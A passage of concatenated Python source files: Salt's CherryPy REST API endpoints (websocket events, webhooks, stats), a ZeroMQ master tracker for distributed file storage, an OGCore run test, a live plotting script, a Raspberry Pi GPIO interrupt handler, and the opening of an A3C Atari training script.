:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: text
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: text
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
Above examples show how to establish a websocket connection to Salt and
activating real time updates from Salt's event stream by signaling
``websocket client ready``.
"""
# Pulling the session token from an URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get("token")
else:
salt_token = cherrypy.session.get("token")
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
"""
An iterator to return Salt events (and optionally format them)
"""
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
transport=self.opts["transport"],
opts=self.opts,
listen=True,
)
stream = event.iter_events(full=True, auto_reconnect=True)
SaltInfo = event_processor.SaltInfo(handler)
def signal_handler(signal, frame):
os._exit(0)
signal.signal(signal.SIGTERM, signal_handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if "format_events" in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send(
"data: {}\n\n".format(
salt.utils.json.dumps(data)
), # future lint: disable=blacklisted-function
False,
)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{}".format(data)
)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle asynchronous push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook:
"""
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication however not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor <reactor>`
"""
exposed = True
tag_base = ["salt", "netapi", "hook"]
_cp_config = dict(
LowDataAdapter._cp_config,
**{
# Don't do any lowdata processing on the POST data
"tools.lowdata_fmt.on": True,
# Auth can be overridden in __init__().
"tools.salt_auth.on": True,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.event = salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
transport=self.opts["transport"],
opts=self.opts,
listen=False,
)
if cherrypy.config["apiopts"].get("webhook_disable_auth"):
self._cp_config["tools.salt_auth.on"] = False
def POST(self, *args, **kwargs):
"""
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook \\
-H 'Content-type: application/json' \\
-d '{"foo": "Foo!", "bar": "Bar!"}'
.. code-block:: text
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/json
{"foo": "Foo!", "bar": "Bar!"}
**Example response**:
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: jinja
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ revision }}
{% endif %}
"""
tag = "/".join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, "raw_body", "")
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event(
{"body": raw_body, "post": data, "headers": headers}, tag
)
return {"success": ret}
class Stats:
"""
Expose statistics on the running CherryPy server
"""
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def __init__(self):
if cherrypy.config["apiopts"].get("stats_disable_auth"):
self._cp_config["tools.salt_auth.on"] = False
def GET(self):
"""
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
"""
if hasattr(logging, "statistics"):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App:
"""
Class to serve HTML5 apps
"""
exposed = True
def GET(self, *args):
"""
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
"""
apiopts = cherrypy.config["apiopts"]
default_index = os.path.abspath(
os.path.join(os.path.dirname(__file__), "index.html")
)
return cherrypy.lib.static.serve_file(apiopts.get("app", default_index))
class API:
"""
Collect configuration and URL map for building the CherryPy app
"""
url_map = {
"index": LowDataAdapter,
"login": Login,
"logout": Logout,
"token": Token,
"minions": Minions,
"run": Run,
"jobs": Jobs,
"keys": Keys,
"events": Events,
"stats": Stats,
}
def _setattr_url_map(self):
"""
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
"""
if self.apiopts.get("enable_sessions", True) is False:
url_blacklist = ["login", "logout", "minions", "jobs"]
else:
url_blacklist = []
urls = (
(url, cls) for url, cls in self.url_map.items() if url not in url_blacklist
)
for url, cls in urls:
setattr(self, url, cls())
def _update_url_map(self):
"""
Assemble any dynamic or configurable URLs
"""
if HAS_WEBSOCKETS:
self.url_map.update({"ws": WebsocketEndpoint})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update(
{self.apiopts.get("webhook_url", "hook").lstrip("/"): Webhook}
)
# Enable the single-page JS app URL.
self.url_map.update({self.apiopts.get("app_path", "app").lstrip("/"): App})
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.apiopts = cherrypy.config["apiopts"]
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
"""
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
"""
conf = {
"global": {
"server.socket_host": self.apiopts.get("host", "0.0.0.0"),
"server.socket_port": self.apiopts.get("port", 8000),
"server.thread_pool": self.apiopts.get("thread_pool", 100),
"server.socket_queue_size": self.apiopts.get("queue_size", 30),
"max_request_body_size": self.apiopts.get(
"max_request_body_size", 1048576
),
"debug": self.apiopts.get("debug", False),
"log.access_file": self.apiopts.get("log_access_file", ""),
"log.error_file": self.apiopts.get("log_error_file", ""),
},
"/": {
"request.dispatch": cherrypy.dispatch.MethodDispatcher(),
"tools.trailing_slash.on": True,
"tools.gzip.on": True,
"tools.html_override.on": True,
"tools.cors_tool.on": True,
},
}
if salt.utils.versions.version_cmp(cherrypy.__version__, "12.0.0") < 0:
# CherryPy >= 12.0 no longer supports "timeout_monitor", only set
# this config option when using an older version of CherryPy.
# See Issue #44601 for more information.
conf["global"]["engine.timeout_monitor.on"] = self.apiopts.get(
"expire_responses", True
)
if cpstats and self.apiopts.get("collect_stats", False):
conf["/"]["tools.cpstats.on"] = True
if "favicon" in self.apiopts:
conf["/favicon.ico"] = {
"tools.staticfile.on": True,
"tools.staticfile.filename": self.apiopts["favicon"],
}
if self.apiopts.get("debug", False) is False:
conf["global"]["environment"] = "production"
# Serve static media if the directory has been set in the configuration
if "static" in self.apiopts:
conf[self.apiopts.get("static_path", "/static")] = {
"tools.staticdir.on": True,
"tools.staticdir.dir": self.apiopts["static"],
}
# Add to global config
cherrypy.config.update(conf["global"])
return conf
def get_app(opts):
"""
Returns a WSGI app and a configuration dictionary
"""
apiopts = opts.get(__name__.rsplit(".", 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config["saltopts"] = opts
cherrypy.config["apiopts"] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
|
Master.py
|
import socket
import time
from collections import defaultdict
from threading import RLock, Thread
import zmq
def nested_dict(n, type):
if n == 1:
return defaultdict(type)
else:
return defaultdict(lambda: nested_dict(n-1, type))
masterHeadFinished = 0
# masterDataFile = { ip1: { port1: [ file1, file2, ... ], port2: [...], ... }, ip2: {...} }
masterDataFile = nested_dict(2, list)
# dataKeepersState = { ip1: { port1: True, port2: False, ... }, ip2: { port1: True, ... }, ... }
dataKeepersState = nested_dict(2, bool)
# filesDictionary = { filename1: [ { ip1: [port1, port2, ...], ip2: [...], ... } , instanceCount], filename2: [...] }
filesDictionary = nested_dict(1, list)
# filesDictionary["filenameKey.mp4"][1] = instanceCount
# filesDictionary["filenameKey.mp4"][0]["tcp:127.0.0.1"] = [8000, 8001, 8002]
iAmAliveDict = nested_dict(1, int)
headDataKeepers = {}
doNreplicates = False
masterIP = "10.147.18.210"
def getIp():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def clientRequestHandler(message, syncLock):
global masterDataFile
global dataKeepersState
syncLock.acquire()
if message[0] == "upload":
# Checks whether there is a free port (j) for each ip (i)
for i in dataKeepersState:
for j in dataKeepersState[i]:
if(dataKeepersState[i][j]):
dataKeepersState[i][j] = False # Make Port Busy
syncLock.release()
print("Datakeeper with ip " + i + " and port " + str(j) + " is now busy")
return [i,j,message[1]]
elif message[0] == "download":
for i in masterDataFile:
for j in masterDataFile[i]:
for k in masterDataFile[i][j]:
if k == message[1] and dataKeepersState[i][j]:
dataKeepersState[i][j] = False # Make Port Busy
syncLock.release()
print("Datakeeper with ip " + i + " and port " + str(j) + " is now busy")
return [i,j,message[1]]
elif message[0] == "downloaded":
dataKeepersState[message[1]][message[2]] = True
print("Datakeeper with ip " + message[1] + " and port " + str(message[2]) + " is now available")
syncLock.release()
return ["confirmed"]
syncLock.release()
return None
def masterClientConnection(clientSocket, syncLock):
global masterDataFile
global dataKeepersState
# Sending/Receiving data from client
# Wait for next request from client
message = []
try:
message = clientSocket.recv_pyobj()
print("A client is " + message[0] + "ing " + message[1])
except zmq.error.Again:
return
# TODO: Function made by friedPotato7 use messege[upload/download,filename.mp4] and return arr[ip,port#,path of file] replaced by 8000
# port = ["tcp://localhost:",8000,"Alberto Mardegan - Selfie del futuro.mp4"]
port = clientRequestHandler(message, syncLock)
clientSocket.send_pyobj(port)
def masterDatakeeperConnection(masterIndex, datakeeperSocket, numberOfProcessesPerDataKeeper, syncLock, successMsgDataKeeperSocket):
global masterDataFile
global dataKeepersState
global filesDictionary
global iAmAliveDict
global doNreplicates
try:
data = successMsgDataKeeperSocket.recv_string()
successMsgDataKeeperSocket.send_string("done")
messagedata, ip, port, fileName = data.split()
except zmq.error.Again:
messagedata = "-1"
pass
if messagedata == "2":
syncLock.acquire()
print("Master #"+ str(masterIndex)+": file with name: " + fileName +" has been successfully uploaded on machine with ip: "+ ip+"\n" )
doNreplicates=False # To unlock DoNreplicates in case SrcMachine send file to Machine_to_copy
addFile(ip,port,fileName, numberOfProcessesPerDataKeeper)
dataKeepersState["tcp://"+ip+":"][port] = True
for i in range(numberOfProcessesPerDataKeeper):
masterDataFile["tcp://"+ip+":"][str(8000+i)].append(fileName)
syncLock.release()
if messagedata == "3":
syncLock.acquire()
dataKeepersState[ip][port] = True
# doNreplicates = False
syncLock.release()
try:
string = datakeeperSocket.recv_string()
topic, messagedata ,ip ,NodeIndex , processesIndex = string.split()
except zmq.error.Again:
return
if topic == "1" and messagedata == "1":
iAmAliveDict[ip] += 1
# print("Datakeeper with ip " + ip + " is alive")
def addFile(ip, port, fileName, numberOfProcessesPerDataKeeper):
global filesDictionary
if(len(filesDictionary[fileName]) == 0):
temp = nested_dict(1, list)
filesDictionary[fileName].append(temp)
filesDictionary[fileName].append(0)
if(len(filesDictionary[fileName][0]["tcp://"+ip+":"]) == 0):
filesDictionary[fileName][1] += 1
for i in range(numberOfProcessesPerDataKeeper):
filesDictionary[fileName][0]["tcp://" +
ip + ":"].append(str(8000+i))
def initialzeClientMasterConnection(masterIndex, startingPortMasterClient):
# Bind ports for clients
clientPort = startingPortMasterClient+masterIndex
context = zmq.Context()
clientSocket = context.socket(zmq.REP)
clientSocket.bind("tcp://" + masterIP + ":%s" % clientPort)
clientSocket.RCVTIMEO = 1
return clientSocket
def initialzeDatakeeperMasterConnection(masterIndex, numberOfNodes_Datakeeper, numberOfProcessesPerDataKeeper, syncLock):
global masterHeadFinished
global masterDataFile
global dataKeepersState
global iAmAliveDict
global headDataKeepers
# Bind ports for datakeeper
print("Master #"+ str(masterIndex) + " is waiting for Datakeepers")
headDataKeepers=[]
if masterIndex == 0:
context1 = zmq.Context()
masterReceiver = context1.socket(zmq.PULL)
masterReceiver.bind("tcp://" + masterIP + ":%s" % str(17777)) # getIp()
initializedDataKeepers = 0
syncLock.acquire()
while initializedDataKeepers < numberOfNodes_Datakeeper * numberOfProcessesPerDataKeeper:
address = masterReceiver.recv_pyobj()
print("Datakeeper with address " + str(address["ip"]) + " is connected to Master#" + str(masterIndex))
for i in range(numberOfProcessesPerDataKeeper):
masterDataFile["tcp://"+address["ip"]+":"][str(8000+i)] = []
dataKeepersState["tcp://" +
address["ip"]+":"][str(8000+i)] = True
if address["head"]:
iAmAliveDict[address["ip"]] = 0
headDataKeepers.append(
"tcp://"+str(address["ip"])+":"+str(5556))
initializedDataKeepers += 1
masterHeadFinished = 1
syncLock.release()
else:
while masterHeadFinished == 0:
pass
context = zmq.Context()
datakeeperSocket = context.socket(zmq.SUB)
for j in headDataKeepers:
datakeeperSocket.connect(j)
topicfilter = "1"
datakeeperSocket.setsockopt_string(zmq.SUBSCRIBE, topicfilter)
datakeeperSocket.RCVTIMEO = 1
return datakeeperSocket
def nReplicatesMasterDatakeeper(masterIndex):
context = zmq.Context()
socket = context.socket(zmq.PUB)
port = 10000+masterIndex
socket.bind("tcp://" + masterIP + ":%s" % port)
return socket
def successMsgSocket(masterIndex):
context = zmq.Context()
socket = context.socket(zmq.REP)
socket.bind("tcp://" + masterIP + ":" + str(15000+masterIndex))
socket.RCVTIMEO = 1
return socket
def makeNReplicates(syncLock, nrSocket, n, masterIndex):
global doNreplicates
global filesDictionary
global masterDataFile
global dataKeepersState
syncLock.acquire()
if(len(filesDictionary) == 0):
doNreplicates = False
syncLock.release()
return
syncLock.release()
noNreplicatesRequired = True
syncLock.acquire()
for file in filesDictionary:
# get el instance count bta3 file
instance_count = filesDictionary[file][1]
if instance_count < n:
for i in range(n-instance_count):
source_machine = getSourceMachine(file,syncLock)
if source_machine == False:
print("All source Machines are busy failed to Make n Replicates")
break
machine_to_copy_1 = selectMachineToCopyTo(syncLock, file)
if machine_to_copy_1 == False:
dataKeepersState[source_machine[1]
][source_machine[2]] = True
print("All Machines_To_Copy are busy failed to Make n Replicates")
break
noNreplicatesRequired = False
NotifyMachineDataTransfer(
source_machine, machine_to_copy_1, nrSocket)
print(
"----------------------------------------------------------------------------------")
print(
"-- N Replicates Loading !!! --")
print(
"----------------------------------------------------------------------------------")
if(noNreplicatesRequired):
doNreplicates = False
syncLock.release()
def getSourceMachine(file, syncLock):
global filesDictionary
global dataKeepersState
# getFreeMachine=False
srcMachine = []
srcMachine.append(file)
syncLock.acquire()
for ip in filesDictionary[file][0]:
for port in filesDictionary[file][0][ip]:
if dataKeepersState[ip][port]:
# getFreeMachine=True
dataKeepersState[ip][port] = False
syncLock.release()
srcMachine.append(ip)
srcMachine.append(port)
print("Source Machine Found at ip: " + str(ip) + str(port))
return srcMachine
syncLock.release()
return False
def selectMachineToCopyTo(syncLock, fileName):
global masterDataFile
global dataKeepersState
notFound = True
# selectMachine=False
# while selectMachine==False:
syncLock.acquire()
for i in masterDataFile:
for j in masterDataFile[i]:
notFound = True
for k in masterDataFile[i][j]:
if k == fileName:
notFound = False
break
if notFound == True and dataKeepersState[i][j]:
dataKeepersState[i][j] = False # Make Port Busy
syncLock.release()
# selectMachine=True
print("Machine to Copy Found at ip: " + str(i) + str(j))
return[i, j]
syncLock.release()
return False
def NotifyMachineDataTransfer(source_machine, machine_to_copy,nrSocket):
msgToSrcMachine=[str(machine_to_copy[0])+machine_to_copy[1],source_machine[0],"source_machine",str(source_machine[1]),str(source_machine[2])]
topic = 1
# send to source machine ip and port of "machine_to_copy" and filename and variable to know it is source_machine
nrSocket.send_string("%d %s %s %s %s %s" % (topic, str(
machine_to_copy[0])+machine_to_copy[1], source_machine[0], "source_machine", str(source_machine[1]), str(source_machine[2])))
print("Source machine is notified to send the file to Machine_to_copy")
def masterTracker(masterIndex, numberOfNodes_Datakeeper, numberOfProcessesPerDataKeeper, startingPortMasterClient, syncLock, replicatesCount):
global doNreplicates
global masterHeadFinished
global masterDataFile
global dataKeepersState
global filesDictionary
global iAmAliveDict
global headDataKeepers
timerCounter = 0
clientSocket = initialzeClientMasterConnection(
masterIndex, startingPortMasterClient)
datakeeperSocket = initialzeDatakeeperMasterConnection(
masterIndex, numberOfNodes_Datakeeper, numberOfProcessesPerDataKeeper, syncLock)
# nReplicates Master Datakeeper Connection
nrSocket = nReplicatesMasterDatakeeper(masterIndex)
successMsgDataKeeperSocket = successMsgSocket(masterIndex)
startTime = time.time()
while True:
# Connecting with client
masterClientConnection(clientSocket, syncLock)
# Connecting with data
masterDatakeeperConnection(masterIndex, datakeeperSocket,
numberOfProcessesPerDataKeeper, syncLock, successMsgDataKeeperSocket)
if time.time() - startTime > 1:
timerCounter += 1
syncLock.acquire()
willDel = []
for ip in iAmAliveDict:
if iAmAliveDict[ip]+50 < timerCounter:
if dataKeepersState["tcp://"+ip+":"][str(8000)]==True :
print("Datakeeper on ip: " + ip + " is dead, removing it from Master shared memory...")
del masterDataFile["tcp://"+ip+":"]
del dataKeepersState["tcp://"+ip+":"]
willDel.append(ip)
for i in filesDictionary:
filesDictionary[i][1] -= 1
del filesDictionary[i][0]["tcp://"+ip+":"]
else:
iAmAliveDict[ip] = timerCounter
for i in willDel:
del iAmAliveDict[i]
syncLock.release()
startTime = time.time()
syncLock.acquire()
if doNreplicates == False:
doNreplicates = True
makeNReplicates(syncLock, nrSocket, replicatesCount, masterIndex)
syncLock.release()
def main():
##############################################################################################################################################
################# PLEASE EITHER HARDCODE THE MASTER IP AND COMMENT THE FOLLOWING INPUT BLOCK OR INPUT THEM THROUGH CLI ###################
##############################################################################################################################################
print("/////////////////////////////////////////////////////////////////////")
print("//////////////// Please enter the master server IP //////////////////")
print("/////////////////////////////////////////////////////////////////////")
masterIP = input()
##############################################################################################################################################
# number of processes multi-process(MasterTracker)
numberOfthreadssOfMaster = 5
# number of processes multi-process(data keeper)
numberOfprocessesOfNodes = 3
numberOfNodes = 2 # number of nodes of data keeper
startingPortMasterClient = 7000 # first port between client/master
replicatesCount = 2 # count of replicates
threads = []
syncLock = RLock()
for k in range(numberOfthreadssOfMaster):
t = Thread(target=masterTracker, args=(k, numberOfNodes, numberOfprocessesOfNodes, startingPortMasterClient, syncLock, replicatesCount))
threads.append(t)
for j in threads:
j.start()
for j in threads:
j.join()
print("Done!")
while(True):
[]
main()
|
test_run_example.py
|
"""
This test tests whether starting a `run_ogcore_example.py` run of the model does
not break down (is still running) after 5 minutes or 300 seconds.
"""
import multiprocessing
import time
import os
import sys
import pandas as pd
import importlib.util
import shutil
from pathlib import Path
import pytest
def call_run_ogcore_example():
cur_path = os.path.split(os.path.abspath(__file__))[0]
path = Path(cur_path)
roe_fldr = os.path.join(path.parent, "run_examples")
roe_file_path = os.path.join(roe_fldr, "run_ogcore_example.py")
spec = importlib.util.spec_from_file_location(
"run_ogcore_example.py", roe_file_path
)
roe_module = importlib.util.module_from_spec(spec)
sys.modules["run_ogcore_example.py"] = roe_module
spec.loader.exec_module(roe_module)
roe_module.main()
@pytest.mark.local
def test_run_ogcore_example(f=call_run_ogcore_example):
p = multiprocessing.Process(target=f, name="run_ogcore_example", args=())
p.start()
time.sleep(300)
if p.is_alive():
p.terminate()
p.join()
timetest = True
else:
print("run_ogcore_example did not run for minimum time")
timetest = False
print("timetest ==", timetest)
# Delete directory created by run_ogcore_example.py
cur_path = os.path.split(os.path.abspath(__file__))[0]
path = Path(cur_path)
roe_output_dir = os.path.join(
path.parent, "run_examples", "OUTPUT_BASELINE"
)
shutil.rmtree(roe_output_dir)
assert timetest
@pytest.mark.local
def test_run_ogcore_example_output(f=call_run_ogcore_example):
p = multiprocessing.Process(target=f, name="run_ogcore_example", args=())
p.start()
p.join() # this makes sure process finished running before going on
cur_path = os.path.split(os.path.abspath(__file__))[0]
path = Path(cur_path)
expected_df = pd.read_csv(
os.path.join(
path.parent, "run_examples", "expected_ogcore_example_output.csv"
)
)
# read in output from this run
test_df = pd.read_csv(
os.path.join(path.parent, "run_examples", "ogcore_example_output.csv")
)
# Delete directory created by run_ogcore_example.py
roe_output_dir = os.path.join(
path.parent, "run_examples", "OUTPUT_BASELINE"
)
shutil.rmtree(roe_output_dir)
pd.testing.assert_frame_equal(expected_df, test_df)
|
ioplotting.py
|
import time
import threading
import matplotlib.pyplot as plt
import math
global data
data = []
def dataInput():
start = time.time()
while True:
time.sleep(.03)
data.append(math.sin(time.time() - start)* (time.time() - start))
def plotter():
while True:
start = time.time()
length = len(data)
plt.scatter(range(length), data[0:length])
plt.pause(.1)
print(time.time() - start)
print('')
thread1 = threading.Thread(target = dataInput)
thread2 = threading.Thread(target = plotter)
thread1.start()
thread2.start()
|
interrupt_rising.falling_queue.py
|
#!/usr/bin/python3
import RPi.GPIO as GPIO
import time
import queue as Queue # https://pymotw.com/2/Queue/
from functools import partial
from threading import Thread
#------------------------------------------------------------------------
# use the raspi board pin number
#GPIO.setmode(GPIO.BOARD)
# use the gpio number
GPIO.setmode(GPIO.BCM)
Taster = 25
#------------------------------------------------------------------------
def interrupt_event(qF, qR, pin):
if GPIO.input(pin) == GPIO.HIGH:
qR.put(pin)
else:
qF.put(pin)
def rising_edge(queue):
while running:
if not queue.empty():
pin = queue.get()
zeit = time.strftime("%d.%m.%Y %H:%M:%S")
print("{} Rising edge detected on {}".format(zeit, pin))
time.sleep(0.5)
def falling_edge(queue):
while running:
if not queue.empty():
pin = queue.get()
zeit = time.strftime("%d.%m.%Y %H:%M:%S")
print("{} Falling edge detected on {}".format(zeit, pin))
time.sleep(0.5)
def main():
queueFalling = Queue.Queue()
queueRising = Queue.Queue()
rising_thread = Thread(target=rising_edge, args=(queueRising,))
falling_thread = Thread(target=falling_edge, args=(queueFalling,))
rising_thread.start()
falling_thread.start()
GPIO.setup(Taster, GPIO.IN)
GPIO.add_event_detect(Taster, GPIO.BOTH, callback=partial(interrupt_event, queueFalling, queueRising), bouncetime=200)
#keep script running
while True:
time.sleep(5)
if __name__ == '__main__':
try:
running = True
main()
except (KeyboardInterrupt, SystemExit):
running = False
print("\nQuit\n")
GPIO.cleanup()
|
a3c.py
|
"""
NOTES
After upgrading pytorch to 2.0, the manual seed + span subprocessing (only choice in 2.7)
cause CUDA Error 3.
check the error issue: https://github.com/pytorch/pytorch/issues/2517
"""
from __future__ import print_function
from collections import deque
import time
import os
import torch
from torch.autograd import Variable
# noinspection PyPep8Naming
import torch.nn.functional as F
import torch.multiprocessing as mp
import argparse
import shutil
from scipy.misc import imsave
from utils import FloatTensor, get_elapsed_time_str, SharedAdam
from envs import create_atari_env
from model import ActorCritic
# Parse program arguments
parser = argparse.ArgumentParser(description='Asynchronous Actor Critic')
parser.add_argument('--savedir', default='/tmp', type=str, metavar='PATH',
help='Dir name in which we save checkpoints')
parser.add_argument('--resume', dest='resume', type=str,
help="If checkpoint available, resume from latest")
parser.add_argument('--no-resume', dest='resume', action='store_false')
parser.set_defaults(resume=True)
parser.add_argument('--play', default='', type=str, metavar='PATH',
help='play your modle with path specified')
parser.add_argument('--rom', default='PongDeterministic-v4', type=str, metavar='GYMROMNAME',
help='Game ROM, e.g. PongDeterministic-v4 (default)')
args = parser.parse_args()
romname = args.rom
SEED = 1
# noinspection PyShadowingNames
def ensure_shared_grads(model, shared_model):
for param, shared_param in zip(model.parameters(),
shared_model.parameters()):
if shared_param.grad is not None:
return
shared_param._grad = param.grad
# noinspection PyShadowingNames
def train(rank, shared_model, optimizer):
"""
:param rank: worker-ID
:param shared_model: model to sync between workers
:param optimizer:
:return:
"""
# torch.manual_seed(SEED + rank)
ac_steps = 20 # The amount of steps before you review
max_episode_length = 10000 # The game will stop after this amount of time and maybe re run the game?
gamma = 0.99
tau = 1.0
max_grad_norm = 50.0 # Limit the direction of gradient travel within the queue. Anything outside the queue is cut
checkpoint_n = 20 # To see the model after this many n. Can increase this number if have a shit comp
env = create_atari_env(romname) # enage game. romname is depending on the game of your choice.
env.seed(SEED + rank) # For the problem to occur again? LOOK THIS UP
state = env.reset()
# Allow torch to handle pixel data. Don't understrand squeeze. FloatTensor - Tensor is an array, therefore array of float.
state = Variable(torch.from_numpy(state).unsqueeze(0).type(FloatTensor), requires_grad=False)
# Selecting model, with this size of input and that kind of output
model = ActorCritic(env.observation_space.shape[0], env.action_space)
t = 0
done = True # Starting from a state when gameover is true!
episodes = 0
reward_sum = 0
reward_sum1 = 0
start_time = time.time()
best_reward = -999
isbest = 0
cx = hx = None
while True:
model.load_state_dict(shared_model.state_dict()) # Pull the up to date model from the shared model
if done: # need to reset LSTM cell's input
# the LSTM units need their own output to feed into next step
# input (hence the name of the kind: recurrent neural nets).
# At the beginning of an episode, to get things started,
# we need to allocate some initial values in the required format,
# i.e. the same size as the output of the layer.
#
# see http://pytorch.org/docs/master/_modules/torch/nn/modules/rnn.html#LSTM
# for details
#
# Optionally, you can remove LSTM to simplify the code
# Think: what is the possible loss?
cx = Variable(torch.zeros(1, 256)).type(FloatTensor) # torch.zeros - setting the values to all zeros since there's nothing there yet
hx = Variable(torch.zeros(1, 256)).type(FloatTensor)
else:
cx = Variable(cx.data) # takes the last computed value for the next input
hx = Variable(hx.data) # basically this is to detach from previous comp graph
states = []
values = []
log_probs = []
rewards = []
entropies = []
for i in range(ac_steps): # Running through the 20 steps
t += 1
v, logit, (hx, cx) = model((state, (hx, cx))) # When you run model, it will return you 4 values -> store those 4 values in v, logit, etc.
states.append(state)
prob = F.softmax(logit) # The gradient descent thing
